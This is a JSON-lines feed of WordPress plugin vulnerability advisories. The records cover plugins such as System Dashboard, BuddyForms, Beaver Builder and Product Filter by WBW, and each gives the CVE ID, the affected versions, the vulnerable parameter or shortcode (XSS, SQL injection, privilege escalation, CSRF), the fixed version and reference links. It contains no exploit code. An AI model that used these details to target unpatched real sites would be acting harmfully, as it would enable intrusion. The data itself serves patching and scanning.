version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stockdio-historical-chart\\\/trunk\\\/stockdioplugin.php#L1155\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stockdio-historical-chart\\\/trunk\\\/stockdioplugin.php#L1155\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stockdio-historical-chart\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stockdio-historical-chart\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecf476a8-e341-44d4-988c-a7fb3fb538d1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecf476a8-e341-44d4-988c-a7fb3fb538d1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12299","slug":"system-dashboard","versionImpact":"2.8.17","versionEndExcluding":"2.8.18","description":"The System Dashboard plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the Filename parameter in all versions up to, and including, 2.8.15 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrative user into performing an action such as clicking on a link.","recommendation":"Update to version 2.8.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.15\\\/admin\\\/class-system-dashboard-admin.php#L2323\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.15\\\/admin\\\/class-system-dashboard-admin.php#L2323\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/993670b7-a3ea-497d-ad46-881bd47b9346?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/993670b7-a3ea-497d-ad46-881bd47b9346?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6569","slug":"forms-for-campaign-monitor","versionImpact":"2.8.15","versionEndExcluding":"2.8.16","description":"The Campaign Monitor for WordPress plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.8.15. This is due the plugin not properly restricting direct access to \/forms\/views\/admin\/create.php and display_errors being enabled. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 2.8.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/babf88c4-6328-4ba2-97e4-e1eaaa549dbb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/babf88c4-6328-4ba2-97e4-e1eaaa549dbb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forms-for-campaign-monitor\\\/trunk\\\/forms\\\/views\\\/admin\\\/create.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forms-for-campaign-monitor\\\/trunk\\\/forms\\\/views\\\/admin\\\/create.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3125580%40forms-for-campaign-monitor&new=3125580%40forms-for-campaign-monitor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3125580%40forms-for-campaign-monitor&new=3125580%40forms-for-campaign-monitor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12038","slug":"buddyforms","versionImpact":"2.8.15","versionEndExcluding":"2.8.16","description":"The Post Form \u2013 Registration Form \u2013 Profile Form for User Profiles \u2013 Frontend Content Forms for User Submissions (UGC) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'buddyforms_nav' shortcode in all versions up to, and including, 2.8.15 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244167\\\/buddyforms\\\/trunk\\\/includes\\\/shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244167\\\/buddyforms\\\/trunk\\\/includes\\\/shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff0568e2-3a1e-4ed6-835a-37e3d07d7b63?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff0568e2-3a1e-4ed6-835a-37e3d07d7b63?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11107","slug":"system-dashboard","versionImpact":"2.8.14","versionEndExcluding":"2.8.15","description":"The System Dashboard WordPress plugin before 2.8.15 does not sanitise and escape some parameters when outputting them in the page, which could allow unauthenticated users to perform Cross-Site Scripting attacks.","recommendation":"Update to version 2.8.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a89f1117-8df3-417b-b54f-6587545833ee\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a89f1117-8df3-417b-b54f-6587545833ee\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10708","slug":"system-dashboard","versionImpact":"2.8.14","versionEndExcluding":"2.8.15","description":"The System Dashboard WordPress plugin before 2.8.15 does not validate user input used in a path, which could allow high privilege users such as admin to perform path traversal attacks an read arbitrary files on the server","recommendation":"Update to version 2.8.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/61d750a5-8c2c-4c94-a1a9-6a254c2a0d03\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/61d750a5-8c2c-4c94-a1a9-6a254c2a0d03\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-38474","slug":"forms-for-campaign-monitor","versionEndExcluding":"2.8.14","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Campaign Monitor Campaign Monitor for WordPress allows Reflected XSS.This issue affects Campaign Monitor for WordPress: from n\/a through 2.8.12.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/forms-for-campaign-monitor\\\/wordpress-campaign-monitor-for-wordpress-plugin-2-8-12-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/forms-for-campaign-monitor\\\/wordpress-campaign-monitor-for-wordpress-plugin-2-8-12-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12037","slug":"buddyforms","versionImpact":"2.8.13","versionEndExcluding":"2.8.14","description":"The Post Form \u2013 Registration Form \u2013 Profile Form for User Profiles \u2013 Frontend Content Forms for User Submissions (UGC) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bf_new_submission_link' shortcode in all versions up to, and including, 2.8.13 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231602\\\/buddyforms\\\/trunk\\\/includes\\\/shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231602\\\/buddyforms\\\/trunk\\\/includes\\\/shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/accd4f34-4e10-4c83-96c3-c2a078ecd5cc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/accd4f34-4e10-4c83-96c3-c2a078ecd5cc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6200","slug":"geodirectory","versionImpact":"2.8.119","versionEndExcluding":"2.8.120","description":"The GeoDirectory  WordPress plugin before 2.8.120 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 2.8.120, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27c35255-4963-4d93-85e7-9e7688e5eb2e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27c35255-4963-4d93-85e7-9e7688e5eb2e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8246","slug":"buddyforms","versionImpact":"2.8.11","versionEndExcluding":"2.8.12","description":"The Post Form \u2013 Registration Form \u2013 Profile Form for User Profiles \u2013 Frontend Content Forms for User Submissions (UGC) plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 2.8.11. This is due to plugin not properly restricting what users have access to set the default role on registration forms. This makes it possible for authenticated attackers, with contributor-level access and above, to create a registration form with a custom role that allows them to register as administrators.","recommendation":"Update to version 2.8.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40760f60-b81a-447b-a2c8-83c7666ce410?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40760f60-b81a-447b-a2c8-83c7666ce410?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149760\\\/buddyforms\\\/trunk\\\/includes\\\/admin\\\/form-builder\\\/meta-boxes\\\/metabox-registration.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149760\\\/buddyforms\\\/trunk\\\/includes\\\/admin\\\/form-builder\\\/meta-boxes\\\/metabox-registration.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1110","slug":"yellow-yard","versionEndExcluding":"2.8.12","description":"The Yellow Yard Searchbar WordPress plugin before 2.8.12 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1830e829-4a43-4d98-8214-eecec6bef694\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1830e829-4a43-4d98-8214-eecec6bef694\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2840","slug":"enhanced-media-library","versionImpact":"2.8.9","versionEndExcluding":"2.8.10","description":"The Enhanced Media Library plugin for WordPress is vulnerable to Stored Cross-Site Scripting via media upload functionality in all versions up to, and including, 2.8.9 due to the plugin allowing 'dfxp' files to be uploaded. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15b30ecb-e3ce-4092-841b-3a1b2553596a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15b30ecb-e3ce-4092-841b-3a1b2553596a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/enhanced-media-library\\\/tags\\\/2.8.9&new_path=\\\/enhanced-media-library\\\/tags\\\/2.8.10&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/enhanced-media-library\\\/tags\\\/2.8.9&new_path=\\\/enhanced-media-library\\\/tags\\\/2.8.10&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7246","slug":"system-dashboard","versionImpact":"2.8.9","versionEndExcluding":"2.8.10","description":"The System Dashboard WordPress plugin before 2.8.10 does not sanitize and escape some parameters, which could allow administrators in multisite WordPress configurations to perform Cross-Site Scripting attacks","recommendation":"Update to version 2.8.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7413d5ec-10a7-4cb8-ac1c-4ef554751518\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7413d5ec-10a7-4cb8-ac1c-4ef554751518\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4430","slug":"beaver-builder-lite-version","versionImpact":"2.8.1.2","versionEndExcluding":"2.8.1.3","description":"The Beaver Builder \u2013 WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the photo widget crop attribute in all versions up to, and including, 2.8.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd6ed285-f215-44d3-9db9-9b2bfffee60a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd6ed285-f215-44d3-9db9-9b2bfffee60a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3083534%40beaver-builder-lite-version%2Ftrunk&old=3078825%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3083534%40beaver-builder-lite-version%2Ftrunk&old=3078825%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpbeaverbuilder.com\\\/change-logs\\\/?utm_medium=bb-lite&utm_source=repo-readme&utm_campaign=repo-changelog-page\",\"name\":\"https:\\\/\\\/www.wpbeaverbuilder.com\\\/change-logs\\\/?utm_medium=bb-lite&utm_source=repo-readme&utm_campaign=repo-changelog-page\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3923","slug":"beaver-builder-lite-version","versionImpact":"2.8.1.1","versionEndExcluding":"2.8.1.2","description":"The Beaver Builder \u2013 WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the link_target parameter in all versions up to, and including, 2.8.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99960ff7-62e1-4c44-ae8e-ebda3e075781?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99960ff7-62e1-4c44-ae8e-ebda3e075781?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/tags\\\/2.8.0.7\\\/modules\\\/button\\\/includes\\\/frontend.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/tags\\\/2.8.0.7\\\/modules\\\/button\\\/includes\\\/frontend.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3078825%40beaver-builder-lite-version%2Ftrunk&old=3062187%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3078825%40beaver-builder-lite-version%2Ftrunk&old=3062187%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10882","slug":"product-delivery-date-for-woocommerce-lite","versionImpact":"2.8.0","versionEndExcluding":"2.8.1","description":"The Product Delivery Date for WooCommerce \u2013 Lite plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.8.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e47daed-42cc-4d96-82a1-a3e65af9fa88?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e47daed-42cc-4d96-82a1-a3e65af9fa88?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-delivery-date-for-woocommerce-lite\\\/tags\\\/2.7.5\\\/includes\\\/admin\\\/class-prdd-lite-view-deliveries-table.php#L129\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-delivery-date-for-woocommerce-lite\\\/tags\\\/2.7.5\\\/includes\\\/admin\\\/class-prdd-lite-view-deliveries-table.php#L129\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3185534%40product-delivery-date-for-woocommerce-lite&new=3185534%40product-delivery-date-for-woocommerce-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3185534%40product-delivery-date-for-woocommerce-lite&new=3185534%40product-delivery-date-for-woocommerce-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2223","slug":"login-rebuilder","versionEndExcluding":"2.8.1","description":"The Login rebuilder WordPress plugin before 2.8.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7b356b82-5d03-4f70-b4ce-f1405304bb52\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7b356b82-5d03-4f70-b4ce-f1405304bb52\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11807","slug":"nps-computy","versionImpact":"2.8.0","versionEndExcluding":"2.8.1","description":"The NPS computy plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'data1' and 'data2' parameters in all versions up to, and including, 2.8.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3198661%40nps-computy%2Ftrunk&old=3141365%40nps-computy%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3198661%40nps-computy%2Ftrunk&old=3141365%40nps-computy%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fabeeba6-f3c0-4f9c-a12f-c97801aad810?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fabeeba6-f3c0-4f9c-a12f-c97801aad810?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-47334","slug":"zoho-flow","versionImpact":"2.8.0","versionEndExcluding":"2.8.1","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Zoho Flow Zoho Flow for WordPress allows SQL Injection.This issue affects Zoho Flow for WordPress: from n\/a through 2.7.1.","recommendation":"Update to version 2.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/zoho-flow\\\/wordpress-zoho-flow-plugin-2-7-1-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/zoho-flow\\\/wordpress-zoho-flow-plugin-2-7-1-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13461","slug":"autoship-cloud","versionImpact":"2.8.0","versionEndExcluding":"2.8.1","description":"The Autoship Cloud for WooCommerce Subscription Products plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'autoship-create-scheduled-order-action' shortcode in all versions up to, and including, 2.8.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242136%40autoship-cloud&new=3242136%40autoship-cloud&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242136%40autoship-cloud&new=3242136%40autoship-cloud&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ae16c4e-0151-4414-8612-ec8eb92505fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ae16c4e-0151-4414-8612-ec8eb92505fd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13402","slug":"buddyboss-platform","versionImpact":"2.7.70","versionEndExcluding":"2.8.00","description":"The Buddyboss Platform plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018link_title\u2019 parameter in all versions up to, and including, 2.7.70 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.00, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.buddyboss.com\\\/resources\\\/buddyboss-platform-releases\\\/2-8-00\\\/\",\"name\":\"https:\\\/\\\/www.buddyboss.com\\\/resources\\\/buddyboss-platform-releases\\\/2-8-00\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42743c2f-053b-4f14-bf11-865f978ec017?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42743c2f-053b-4f14-bf11-865f978ec017?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2317","slug":"woo-product-filter","versionImpact":"2.7.9","versionEndExcluding":"2.8.0","description":"The Product Filter by WBW plugin for WordPress is vulnerable to time-based SQL Injection via the filtersDataBackend parameter in all versions up to, and including, 2.7.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-filter\\\/tags\\\/2.7.8\\\/modules\\\/meta\\\/models\\\/meta_values.php#L163\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-filter\\\/tags\\\/2.7.8\\\/modules\\\/meta\\\/models\\\/meta_values.php#L163\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-filter\\\/tags\\\/2.7.8\\\/modules\\\/meta\\\/models\\\/meta_values.php#L174\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-filter\\\/tags\\\/2.7.8\\\/modules\\\/meta\\\/models\\\/meta_values.php#L174\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/329aae11-a141-4c61-8198-1cd8e4e6bfea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/329aae11-a141-4c61-8198-1cd8e4e6bfea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10581","slug":"directorypress-frontend","versionImpact":"2.7.9","versionEndExcluding":"2.8.0","description":"The DirectoryPress Frontend plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.7.9. This is due to missing or incorrect nonce validation on the dpfl_listingStatusChange() function. This makes it possible for unauthenticated attackers to update listing statuses via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3239657%40directorypress-frontend&new=3239657%40directorypress-frontend&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3239657%40directorypress-frontend&new=3239657%40directorypress-frontend&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36986585-7aaa-4c49-b426-fb9078fbb9ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36986585-7aaa-4c49-b426-fb9078fbb9ae?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4127","slug":"wp-seo-structured-data-schema","versionImpact":"2.7.11","versionEndExcluding":"2.8.0","description":"The WP SEO Structured Data Schema plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018Price Range\u2019 parameter in all versions up to, and including, 2.7.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts that will execute whenever an administrator accesses the plugin settings page.","recommendation":"Update to version 2.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-seo-structured-data-schema\\\/trunk\\\/lib\\\/classes\\\/KcSeoHelper.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-seo-structured-data-schema\\\/trunk\\\/lib\\\/classes\\\/KcSeoHelper.php#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3289009\\\/wp-seo-structured-data-schema\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3289009\\\/wp-seo-structured-data-schema\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24f6c4e4-11c3-476f-9f50-42053b625ab8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24f6c4e4-11c3-476f-9f50-42053b625ab8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
